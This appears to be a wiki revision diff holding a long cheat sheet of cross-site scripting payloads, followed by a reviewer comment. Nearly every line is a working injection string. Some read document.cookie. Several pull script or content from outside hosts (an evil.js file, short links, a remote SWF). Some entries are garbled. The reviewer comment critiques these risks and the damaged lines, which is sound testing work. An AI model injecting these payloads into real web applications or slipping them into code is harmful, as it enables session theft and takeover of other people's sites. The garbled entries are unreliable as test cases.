(One intermediate revision by the same user not shown) |
Line 1: |
Line 1: |
| “/></a></><img src=1.gif onerror=alert(document.cookie)>
| | d |
| </script>">'><script>prompt(String.fromCharCode(88.83.83))</script>
| |
| "><option>"><button>img src=x onerror=alert(/xss/);></button></option>
| |
| </title><script>alert(/xss/)</script>
| |
| '"><script>alert(document.domain)</script>
| |
| "><iframe onclick=alert(Evan)></iframe>
| |
| </textarea>"><script>prompt(Evan)</script>
| |
| //>'>"><img src=x onerror=prompt(Evan);>
| |
| "><img src=x onerror=prompt(1)>.asd.asd
| |
| '"()&%1<ScRiPt >prompt(963191)</ScRiPt>
| |
| '"--></style></script><script>alert(/xss/)</script>
| |
| "><img src=x.png onerror=prompt("XSS");>
| |
| "><img src=x onerror=prompt(1);>
| |
| <img src=x onerror=alert(0)>
| |
| "><script>prompt(1)</script>
| |
| "/><script>alert(document.cookie);</script>
| |
| "><IMG SRC=# onmouseover="alert('xss')">
| |
| <svg onload="prompt(/xss by evan/);">
| |
| #!prettyPhoto/<a onclick="alert(/XSS by Evan/);">/
| |
| <IMG SRC="jalert('XSS');">
| |
| <IMG SRC=jalert('XSS')>
| |
| false,false,false);});alert(1); //
| |
| </title><!-- --><body onload=alert(1);></iframe src=http://google.com>-->
| |
| '"onmouseover="prompt(1)"
| |
| "><script>alert(document.domain)</script>
| |
| <script>alert(1);</script>
| |
| <script>prompt(1);</script>
| |
| <script>confirm (/xss by evan/);</script>
| |
| <script src="http://rhainfosec.com/evil.js">
| |
| <scRiPt>alert(1);</scrIPt>
| |
| <scr<script>ipt>alert(1)</scr<script>ipt>
| |
| <a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
| |
| <body/onhashchange=alert(1)><a href=#>clickit
| |
| <img/src=aaa.jpg onerror=prompt(1);>
| |
| <video src=x onerror=prompt(1);>
| |
| <audio src=x onerror=prompt(1);>
| |
| <iframesrc="javascript:alert(2)">
| |
| <iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
| |
| <embed/src=//goo.gl/nlX0P>
| |
| <form action="Javascript:alert(1)"><input type=submit>
| |
| <isindex action="javascript:alert(1)" type=image>
| |
| <isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
| |
| <isindex action=data:text/html, type=image>
| |
| <formaction='data:text/html,<script>alert(1)</script>'><button>CLICK
| |
| <isindexformaction="javascript:alert(1)" type=image>
| |
| <input type="image" formaction=JaVaScript:alert(0)>
| |
| <form><button formaction=javascript:alert(/xssbyevan/)>CLICKME
| |
| <object/data=//goo.gl/nlX0P?
| |
| <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
| |
| <applet code="javascript:confirm(document.cookie);">
| |
| <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
| |
| <svg/onload=prompt(1);>
| |
| <marquee/onstart=confirm(2)>/
| |
| <body onload=prompt(1);>
| |
| <select autofocus onfocus=alert(1)>
| |
| <textarea autofocus onfocus=alert(1)>
| |
| <keygen autofocus onfocus=alert(1)>
| |
| <video><source onerror="javascript:alert(1)">
| |
| <q/oncut=alert(1)>
| |
| <q/oncut=open()>
| |
| <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
| |
| <a onmouseover="javascript:window.onerror=alert;throw 1>
| |
| <img src=x onerror="javascript:window.onerror=alert;throw 1">
| |
| <a onmouseover=location=’javascript:alert(1)>click
| |
| <body onfocus="location='javascrpt:alert(1) >123
| |
| <svg><script>alert(/1/)</script>
| |
| <meta content="
 1 
;JAVASCRIPT: alert(1)" http-equiv="refresh"/>
| |
| <math><a xlink:href="//jsfiddle.net/t846h/">click
| |
| <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg>
| |
| <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
| |
| <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
| |
| <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
| |
| <meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
| |
| " autofocusonfocus=alert(1)//
| |
| " onmouseover="prompt(0) x="
| |
| " onfocusin=alert(1) autofocus x="
| |
| " onfocusout=alert(1) autofocus x="
| |
| " onblur=alert(1) autofocus a="
| |
| ";alert(1)//
| |
| "/></script><svg onload='-/"/-prompt(/xss by evan/)//'
| |
| "><img src=x <img src=x onerror=prompt(7)>=<img src=x onerror=prompt(7)>(1)>
| |
| <img src="<img src=search"/onerror=alert("xss")//">
| |
| "><h1 ondblclick=prompt(document.domain)>xss by evan</h1>
| |
| ';prompt(String.fromCharCode(120,+115,+115))//\';
| |
| <iframe\uB\uC\uAsrc\uB\uC\uA=\uB\uC\uA "javascript:alert(1);">
| |
| <><><><><><a onmouseover=prompt(1337)>XSS</a>
| |
| <a href="java%1B(Jscript:alert(1)">test
| |
| ');alert(document.cookie)//
| |
| "></iframe><script>alert(document.cookie)</script>xss
| |
| '+prompt(9)+'
| |
| <input type="hidden" name="asdhakjshdkjashdkjashd" value="\" onload=confirm(000) />" />
| |
| javascript:alert(1);
| |
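Review bot: The entries containing `<script src="http://rhainfosec.com/evil.js">`, `//goo.gl/nlX0P`, `//jsfiddle.net/t846h/` and the `businessinfo.co.uk` SWF load content from third-party hosts, so whoever controls those hosts or the short link decides what executes in the origin under test; in a shared test list they should point at a labelled placeholder such as `TEST-HOST.example`, which the tester replaces with infrastructure they control. The probes that call `alert(document.cookie)` put a live session value into screenshots and reports, whereas `alert(document.domain)`, already used elsewhere in the list, shows the executing origin without exposing it. The list also has no label for the output context each string targets (element body, quoted attribute, script string, URL), and a few entries such as `<iframesrc="javascript:alert(2)">` and `<IMG SRC="jalert('XSS');">` look damaged in transcription, so as a regression corpus for an encoder or filter they would pass without testing anything. Which side of the revision each row belongs to cannot be recovered from this rendering, so the note applies to the list as shown.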